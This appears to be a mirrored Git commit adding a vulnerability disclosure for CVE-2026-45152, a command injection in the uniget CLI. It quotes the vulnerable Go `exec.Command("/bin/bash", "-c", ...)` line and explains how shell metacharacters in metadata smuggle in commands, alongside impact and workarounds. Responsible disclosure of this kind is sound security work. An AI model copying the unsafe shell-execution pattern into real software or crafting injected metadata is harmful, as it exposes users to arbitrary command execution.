0x5t4l1n/CVE
1
0
Fork 0
mirror of https://github.com/0x5t4l1n/CVE.git synced 2026-05-26 19:26:32 +00:00
Code Issues Packages Projects Releases Wiki Activity

Create CVE-2026-45152.md

Browse Source
This commit is contained in:
Stalin
2026-05-12 18:30:04 +05:30
committed by GitHub
parent 98140b9c79
commit cf6946769c
1 changed files with 80 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
reported/CVE-2026-45152.md
+80
View File
@@ -0,0 +1,80 @@
![CVE](https://img.shields.io/badge/CVE-2026--45152-red)
# CVE-2026-45152 — uniget Command Injection via Unsafe `tool.Check` Execution
> CVE-2026-45152 has been officially published by GitHub Security Advisories.
## Overview
A command injection vulnerability exists in uniget due to unsafe execution of the `check` field from metadata files using `/bin/bash -c`. Because the `check` field is loaded directly from untrusted JSON metadata without validation or sanitization, an attacker can craft malicious metadata that executes arbitrary shell commands on the victims system.
**CVE ID:** CVE-2026-45152
**Affected Version:** uniget CLI ≤ 0.27.0
**Fixed In:** uniget CLI 0.27.1
**Severity:** High
**CWE:** CWE-78 (Improper Neutralization of Special Elements used in an OS Command)
---
## Description
The vulnerability exists in the `RunVersionCheck()` function, where uniget executes the `tool.Check` field using `/bin/bash -c`.
Because metadata files are parsed directly into the `Tool` structure using `json.Unmarshal()`, attacker-controlled input can reach the shell execution sink without validation.
The following vulnerable pattern was identified:
```go
cmd := exec.Command("/bin/bash", "-c", tool.Check+" | tr -d '\n'")
```
Since `/bin/bash -c` interprets shell metacharacters such as `;`, `&&`, `|`, `$()`, and backticks, arbitrary shell commands may be injected and executed.
---
## Impact
An attacker processing malicious metadata may be able to:
* Execute arbitrary shell commands
* Exfiltrate sensitive files or environment variables
* Install malware or backdoors
* Modify or delete accessible files
* Establish persistence on the victim machine
* Compromise CI/CD environments using uniget automation
Commands execute with the privileges of the user running uniget.
---
## Preconditions
* The victim must process attacker-controlled metadata files.
* The vulnerable uniget version must invoke the `tool.Check` field through `/bin/bash -c`.
* The attacker must be able to supply malicious metadata containing shell metacharacters.
---
## Workarounds
* Avoid using `/bin/bash -c` with untrusted input.
* Sanitize or strictly validate metadata fields before execution.
* Execute fixed binaries and arguments directly without invoking a shell.
* Run uniget in isolated or low-privilege environments when processing untrusted metadata.
---
## References
* https://github.com/uniget-org/cli/security/advisories/GHSA-qqq4-5773-pmw5
---
## Discoverer
**Stalin S** ([@0x5t4l1n](https://github.com/0x5t4l1n))